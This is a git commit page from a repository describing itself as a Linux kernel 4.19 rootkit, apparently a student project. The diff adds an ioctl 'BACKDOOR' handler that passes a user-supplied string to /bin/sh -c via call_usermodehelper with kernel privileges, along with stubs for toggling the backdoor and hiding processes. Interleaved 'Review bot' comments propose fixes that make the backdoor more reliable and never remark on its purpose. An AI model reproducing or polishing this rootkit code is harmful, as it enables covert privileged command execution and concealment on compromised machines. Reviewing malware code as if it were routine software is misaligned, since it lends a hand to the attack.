linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

commit 57b6388d8cf52fbdff0ed1794603ef37ce96e48b
parent fa4cb153ac03e5df35f37e7a9464e680a3930b79
Author: deurzen <m.deurzen@tum.de>
Date:   Fri, 27 Nov 2020 11:42:30 +0100

adds initial backdoor code

Diffstat:
Msrc/channel.c | 45+++++++++++++++++++++++++++++++++++++++++++++
Msrc/channel.h | 3+++
Msrc/ioctl.h | 3+++
Msrc/rkctl/rkctl.c | 5+++--
Msrc/rkctl/rkctl.h | 4++--
5 files changed, 56 insertions(+), 4 deletions(-)

diff --git a/src/channel.c b/src/channel.c
@@ -29,6 +29,9 @@ detect_channel(unsigned cmd)
 switch (cmd) {
 case G7_PING: return (channel_t){ "PING", handle_ping };
 case G7_FILEHIDE: return (channel_t){ "FILEHIDE", handle_filehide };
+case G7_BACKDOOR: return (channel_t){ "BACKDOOR", handle_backdoor };
+case G7_TOGGLEBD: return (channel_t){ "TOGGLEBD", handle_togglebd };
+case G7_HIDEPID: return (channel_t){ "HIDEPID", handle_hidepid };
 }
 return (channel_t){ "unknown", NULL };
@@ -69,3 +72,45 @@ handle_filehide(unsigned long arg)
 return 0;
 }
+
+int
+handle_backdoor(unsigned long arg)
+{
+char buf[BUFLEN];
+
+if (!(const char *)arg)
+return -ENOTTY;
+
+copy_from_user(buf, (const char *)arg, BUFLEN);
+
+char *argv[] = {
+"/bin/sh",
+"-c",
+buf,
+NULL
+};
+
+static char *envp[] = {
+"HOME=/",
+"TERM=linux",
+"PATH=/sbin:/bin:/usr/sbin:/usr/bin",
+NULL
+};
+
+call_usermodehelper(argv[0], argv, envp, UMH_WAIT_PROC);
+return 0;
+}
+
+int
+handle_togglebd(unsigned long arg)
+{
+
+return 0;
+}
+
+int
+handle_hidepid(unsigned long arg)
+{
+
+return 0;
+}
diff --git a/src/channel.h b/src/channel.h
@@ -12,5 +12,8 @@ channel_t detect_channel(unsigned);
 // handlers
 int handle_ping(unsigned long);
 int handle_filehide(unsigned long);
+int handle_backdoor(unsigned long);
+int handle_togglebd(unsigned long);
+int handle_hidepid(unsigned long);
 #endif//_GROUP7_CHANNEL_H
diff --git a/src/ioctl.h b/src/ioctl.h
@@ -6,5 +6,8 @@
 #define G7_PING _IOWR(G7_MAGIC_NUMBER, 0x0, char *)
 #define G7_FILEHIDE _IOR(G7_MAGIC_NUMBER, 0x1, char *)
+#define G7_BACKDOOR _IOR(G7_MAGIC_NUMBER, 0x2, char *)
+#define G7_TOGGLEBD _IOR(G7_MAGIC_NUMBER, 0x3, char *)
+#define G7_HIDEPID _IOR(G7_MAGIC_NUMBER, 0x4, char *)
 #endif//_GROUP7_IOCTL_H
diff --git a/src/rkctl/rkctl.c b/src/rkctl/rkctl.c
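Review bot: In `handle_backdoor` the return value of `copy_from_user` is ignored and `buf` is never NUL-terminated, so a user string shorter than BUFLEN (or a range that is only partly readable) leaves `buf` holding uninitialized stack bytes with no terminator before it is handed to `/bin/sh -c`, and string handling downstream can run past the array. The kernel helper for exactly this case reports the copied length or a negative error, and the terminator should be forced either way: `if (strncpy_from_user(buf, (const char __user *)arg, BUFLEN) < 0) return -EFAULT;` followed by `buf[BUFLEN - 1] = '\0';`. The preceding `if (!(const char *)arg)` is just `if (!arg)`, and the result of `call_usermodehelper` is also discarded, so the ioctl reports 0 even when the helper failed to start. The `arg` parameter of the new `handle_togglebd` and `handle_hidepid` stubs is unused; a `(void)arg;` or a `/* TODO: not yet implemented */` comment would make the placeholder status explicit.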
@@ -79,12 +79,13 @@ handle_filehide(void *arg)
 }
 int
-handle_backdoor_execve(void *arg)
+handle_backdoor(void *arg)
 {
+return issue_ioctl(G7_BACKDOOR, (const char *)arg);
 }
 int
-handle_backdoor_toggle(void *arg)
+handle_togglebd(void *arg)
 {
 }
diff --git a/src/rkctl/rkctl.h b/src/rkctl/rkctl.h
@@ -22,8 +22,8 @@ void help();
 int handle_ping(void *);
 int handle_filehide(void *);
-int handle_backdoor_execve(void *);
-int handle_backdoor_toggle(void *);
+int handle_backdoor(void *);
+int handle_togglebd(void *);
 int handle_hidepid(void *);
 #endif//_GROUP7_RKCTL_H
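Review bot: `handle_togglebd` is renamed but its body is still empty, and falling off the end of a non-void function whose result the caller uses is undefined behavior; since `handle_backdoor` directly above now forwards `issue_ioctl`'s result, the stub should return an explicit value until it is implemented, e.g. `return 0;` (or whatever code the dispatcher treats as "unimplemented", which is not visible here). The `(const char *)arg` cast in `handle_backdoor` is harmless but redundant given `issue_ioctl`'s parameter type, assuming it takes a `const char *`. The leading `}` in the hunk closes `handle_filehide`, whose body is outside the hunk.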